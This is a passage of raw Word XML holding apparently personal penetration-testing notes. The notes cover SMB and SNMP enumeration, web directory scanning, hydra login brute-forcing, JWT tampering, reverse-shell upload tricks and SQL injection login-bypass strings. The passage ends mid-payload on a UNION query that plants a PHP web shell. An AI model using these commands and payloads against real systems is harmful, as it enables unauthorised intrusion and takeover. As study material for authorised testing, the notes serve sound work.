      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00034E76">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="323232"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1"/>
        </w:rPr>
        <w:t>smb-vuln-conficker.nse,smb-vuln-cve2009-3103.nse</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00034E76">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="323232"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1"/>
        </w:rPr>
        <w:t>,smb-vuln-cve-2017-7494.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-ms17-010.nse,smb-vuln-regsvc-dos.nse,smb-vuln-webexec.nse -p139,445 &lt;target&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16B224FB" w14:textId="55E7FB5C" w:rsidR="00B352C2" w:rsidRDefault="00B352C2">
      <w:r>
        <w:t>Google specific version vulnerabilities</w:t>
      </w:r>
      <w:r w:rsidR="00034E76">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D9E93B0" w14:textId="10F4B436" w:rsidR="007E3E88" w:rsidRDefault="00D46982">
      <w:r>
        <w:t>Samba 4.0.1&lt;version&lt;4.11.1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="228F062A" w14:textId="7B11C533" w:rsidR="00D46982" w:rsidRDefault="00D46982">
      <w:r w:rsidRPr="00D46982">
        <w:t>https://www.rapid7.com/db/modules/auxiliary/admin/smb/samba_symlink_traversal/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B18B5B3" w14:textId="77777777" w:rsidR="002336CD" w:rsidRDefault="002336CD"/>
    <w:p w14:paraId="33E5D6DE" w14:textId="30362BBB" w:rsidR="00B43F00" w:rsidRPr="00915E3B" w:rsidRDefault="00B43F00" w:rsidP="00915E3B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00915E3B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SNMP (161/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00915E3B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>udp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00915E3B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CDA2837" w14:textId="4EBE44FC" w:rsidR="008571B5" w:rsidRDefault="008571B5">
      <w:r>
        <w:t>If SNMP is running, try to extract useful information using common community strings and use tools to dump the data in a readable format.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18FB35F3" w14:textId="2D32BBB5" w:rsidR="008571B5" w:rsidRDefault="008571B5">
      <w:r>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Snmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-check $RHOST</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E57E90C" w14:textId="7A245FD8" w:rsidR="008571B5" w:rsidRDefault="008571B5">
      <w:r>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Onesixtyone</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -c </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>stringlistpath</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> $RHOST</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="607DE6C4" w14:textId="5C2706EB" w:rsidR="008571B5" w:rsidRDefault="008571B5">
      <w:r>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Snmpwalk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -v1 -c public $RHOST</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08CE4458" w14:textId="6B86E3FC" w:rsidR="00034E76" w:rsidRPr="00034E76" w:rsidRDefault="002E4531" w:rsidP="00034E76">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E31FF">
        <w:rPr>
          <w:rStyle w:val="Heading2Char"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HTTP(S)</w:t>
      </w:r>
      <w:r w:rsidRPr="006E31FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> (80/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006E31FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006E31FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>, 443/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006E31FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006E31FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>, 8000/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006E31FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006E31FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>, 8080/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006E31FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006E31FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>, 8443/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006E31FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006E31FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>, ...)</w:t>
      </w:r>
      <w:r w:rsidR="00034E76">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E61FADF" w14:textId="3BF9A415" w:rsidR="0078632C" w:rsidRDefault="00C11751">
      <w:r>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00034E76">
        <w:t>g</w:t>
      </w:r>
      <w:r>
        <w:t>obuster</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -u $RHOST -w </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006E31FF">
        <w:t>seclists</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006E31FF">
        <w:t>/Discovery/Web-Content/</w:t>
      </w:r>
      <w:r>
        <w:t>common.txt</w:t>
      </w:r>
      <w:r w:rsidRPr="006E31FF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-x .php,.html,.txt -o </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>outfile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="47D14677" w14:textId="1145AF9D" w:rsidR="0078632C" w:rsidRDefault="0078632C">
      <w:r>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00034E76">
        <w:t>g</w:t>
      </w:r>
      <w:r>
        <w:t>obuster</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -u $RHOST -w </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006E31FF" w:rsidRPr="006E31FF">
        <w:t>seclists</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006E31FF" w:rsidRPr="006E31FF">
        <w:t>/Discovery/Web-Content/</w:t>
      </w:r>
      <w:r w:rsidR="00C11751">
        <w:t>raft-large-words.txt</w:t>
      </w:r>
      <w:r w:rsidR="006E31FF" w:rsidRPr="006E31FF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>-x .php,.html,.</w:t>
      </w:r>
      <w:r w:rsidR="006E31FF">
        <w:t>txt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> -o </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>outfile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2274A8E7" w14:textId="0CC2B3D2" w:rsidR="00216231" w:rsidRDefault="00216231">
      <w:r>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Nikto</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -h $RHOST -o </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>outfile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="24792A13" w14:textId="72E4832A" w:rsidR="00216231" w:rsidRDefault="00216231">
      <w:r>
        <w:t>For any services running, I would look for known vulnerabilities that can be exploited.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69846593" w14:textId="6F6FDC35" w:rsidR="00E0332B" w:rsidRDefault="00E0332B">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Login brute force:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="315FC315" w14:textId="7068FF4B" w:rsidR="00E0332B" w:rsidRDefault="00E0332B">
      <w:r w:rsidRPr="00E0332B">
        <w:t xml:space="preserve">hydra -l admin -P </w:t>
      </w:r>
      <w:r w:rsidR="007D5734">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="007D5734">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="007D5734">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>/share/wordlists/rockyou.txt</w:t>
      </w:r>
      <w:r w:rsidR="007D5734">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>-s PORT IP</w:t>
      </w:r>
      <w:r w:rsidRPr="00E0332B">
        <w:t xml:space="preserve"> http-post-form "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>PATH</w:t>
      </w:r>
      <w:r w:rsidRPr="00E0332B">
        <w:t>:j</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E0332B">
        <w:t>_username</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E0332B">
        <w:t>=^USER^&amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E0332B">
        <w:t>j_password</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E0332B">
        <w:t>=^PASS^:Invalid username or password"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D990F4" w14:textId="2AB6E043" w:rsidR="0004548B" w:rsidRPr="0004548B" w:rsidRDefault="0004548B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0004548B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2306638E" w14:textId="6880BD99" w:rsidR="0004548B" w:rsidRDefault="00034E76">
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidR="0017092D" w:rsidRPr="00072086">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5A236C49" w14:textId="341BA65B" w:rsidR="0017092D" w:rsidRPr="0017092D" w:rsidRDefault="0017092D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0017092D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Token manipulation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F51C7B1" w14:textId="4C012641" w:rsidR="00223FAA" w:rsidRDefault="00223FAA">
      <w:r>
        <w:t xml:space="preserve">Manually (use </w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:tgtFrame="_blank" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
            <w:color w:val="007BFF"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>jwt.io</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> to do the decoding/encoding)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C9D012" w14:textId="5343998B" w:rsidR="0017092D" w:rsidRDefault="00223FAA">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6DB388FC" wp14:editId="6F154DFD">
            <wp:extent cx="5731510" cy="648144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65577" w14:textId="77777777" w:rsidR="00223FAA" w:rsidRDefault="00223FAA"/>
    <w:p w14:paraId="31CD27EF" w14:textId="121C0575" w:rsidR="0094432F" w:rsidRPr="0094432F" w:rsidRDefault="0094432F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0094432F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>File upload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A790B8" w14:textId="6D058E88" w:rsidR="008416D5" w:rsidRDefault="00AA389A">
      <w:r>
        <w:t>Try reverse shells with all the extensions listed below.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FCE4CFF" w14:textId="4A37A608" w:rsidR="008416D5" w:rsidRDefault="00AA389A">
      <w:r>
        <w:t>If one uploads, hope it executes automatically.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F988FF1" w14:textId="723252D6" w:rsidR="008416D5" w:rsidRDefault="008416D5">
      <w:r>
        <w:t>If it doesn’t execute, may need to access through other means.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA0CC96" w14:textId="0FA1E531" w:rsidR="008416D5" w:rsidRDefault="008416D5" w:rsidP="008416D5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>If still doesn’t work, add      GIF89</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">a;   </w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">          to the very beginning of shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D50938B" w14:textId="26E33CFE" w:rsidR="0094432F" w:rsidRDefault="008416D5">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="63B0FDCB" wp14:editId="20278342">
            <wp:extent cx="2189018" cy="1217799"/>
            <wp:effectExtent l="0" t="0" r="1905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99666" cy="1223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4501C" w14:textId="7E0BD316" w:rsidR="00223BCB" w:rsidRPr="00223BCB" w:rsidRDefault="00223BCB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00223BCB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C6850E6" w14:textId="4937AAA4" w:rsidR="00223BCB" w:rsidRDefault="00223BCB">
      <w:r>
        <w:t>On login portals</w:t>
      </w:r>
      <w:r w:rsidR="002573FB">
        <w:t xml:space="preserve"> (or any POST)</w:t>
      </w:r>
      <w:r>
        <w:t>, try a correct username and one of the following</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BD82CB9" w14:textId="77777777" w:rsidR="00223BCB" w:rsidRDefault="00223BCB" w:rsidP="00223BCB">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FCFBF9"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:after="240" w:line="270" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="003262"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="003262"/>
        </w:rPr>
        <w:t>' or 1=1--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F3898B6" w14:textId="2747794F" w:rsidR="00223BCB" w:rsidRDefault="00223BCB" w:rsidP="00223BCB">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FCFBF9"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:after="240" w:line="270" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="003262"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="003262"/>
        </w:rPr>
        <w:t xml:space="preserve">        ' or 1=1#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69476059" w14:textId="7F83A0F5" w:rsidR="00223BCB" w:rsidRDefault="00223BCB" w:rsidP="00223BCB">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FCFBF9"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:after="240" w:line="270" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="003262"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="003262"/>
        </w:rPr>
        <w:t xml:space="preserve">        ' or 1=1/*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72481543" w14:textId="0943187B" w:rsidR="00223BCB" w:rsidRDefault="00223BCB" w:rsidP="00223BCB">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FCFBF9"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:after="240" w:line="270" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="003262"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="003262"/>
        </w:rPr>
        <w:t xml:space="preserve">        ') or '1'='1--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5264B0DC" w14:textId="7C059966" w:rsidR="00223BCB" w:rsidRDefault="00223BCB" w:rsidP="00223BCB">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FCFBF9"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:after="240"/>
        <w:rPr>
          <w:color w:val="003262"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="003262"/>
        </w:rPr>
        <w:t xml:space="preserve">        ') or ('1'='1--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F7574BE" w14:textId="46896D4C" w:rsidR="00EC2F68" w:rsidRDefault="00EC2F68">
      <w:r>
        <w:t xml:space="preserve">Try with </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>“ too</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="59F67514" w14:textId="66D11DEA" w:rsidR="00223BCB" w:rsidRDefault="00223BCB">
      <w:r>
        <w:t>For query parameters (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>e.g</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> id), identify with</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78991C31" w14:textId="0DE3C1D1" w:rsidR="00223BCB" w:rsidRDefault="00223BCB">
      <w:r>
        <w:tab/>
        <w:t>?id=1’</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>?id=1’ --</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>?id=1’ #</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>?id=1’/*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D8F07CF" w14:textId="5FEBC232" w:rsidR="00223BCB" w:rsidRDefault="00223BCB">
      <w:r>
        <w:t xml:space="preserve">And exploit with </w:t>
      </w:r>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidR="006C6ECD" w:rsidRPr="00072086">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://cobalt.io/blog/a-pentesters-guide-to-sql-injection-sqli</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="79DE3FCA" w14:textId="4A56652E" w:rsidR="00130DA7" w:rsidRDefault="00130DA7">
      <w:r>
        <w:t>Find no. cols -&gt; Find which col outputs to screen -&gt; find table names -&gt; Find column names from interesting tables -&gt; extract interesting columns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="247164DF" w14:textId="19CC5971" w:rsidR="00130DA7" w:rsidRDefault="00130DA7">
      <w:r>
        <w:t>If failing, look up DBMS specific guide from (or others)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F746FFF" w14:textId="1636E58E" w:rsidR="00130DA7" w:rsidRDefault="00034E76" w:rsidP="00130DA7">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:hyperlink r:id="rId10" w:history="1">
        <w:r w:rsidR="00130DA7" w:rsidRPr="00072086">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.securityidiots.com/Web-Pentest/SQL-Injection/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="630071BA" w14:textId="4E356ACC" w:rsidR="00130DA7" w:rsidRDefault="00130DA7" w:rsidP="00130DA7">
      <w:r>
        <w:t>Also try error based if this doesn’t work but can see errors.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7285EDB9" w14:textId="3ADE3684" w:rsidR="009C5C5F" w:rsidRDefault="009C5C5F">
      <w:r>
        <w:t xml:space="preserve">If MYSQL, try to </w:t>
      </w:r>
      <w:r w:rsidR="0004548B">
        <w:t xml:space="preserve">upload </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0004548B">
        <w:t>reverse.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4CE2B937" w14:textId="77777777" w:rsidR="0004548B" w:rsidRDefault="0004548B" w:rsidP="0004548B">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:shd w:val="clear" w:color="auto" w:fill="DDDDDD"/>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="3"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="3"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>http://example.com/photoalbum.php?id=1 union all select 1,2,3,4,"&lt;?php echo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30E85716" w14:textId="77777777" w:rsidR="0004548B" w:rsidRDefault="0004548B" w:rsidP="0004548B">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:shd w:val="clear" w:color="auto" w:fill="DDDDDD"/>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="3"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="3"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>shell_exec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="3"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>($_GET['</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="3"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
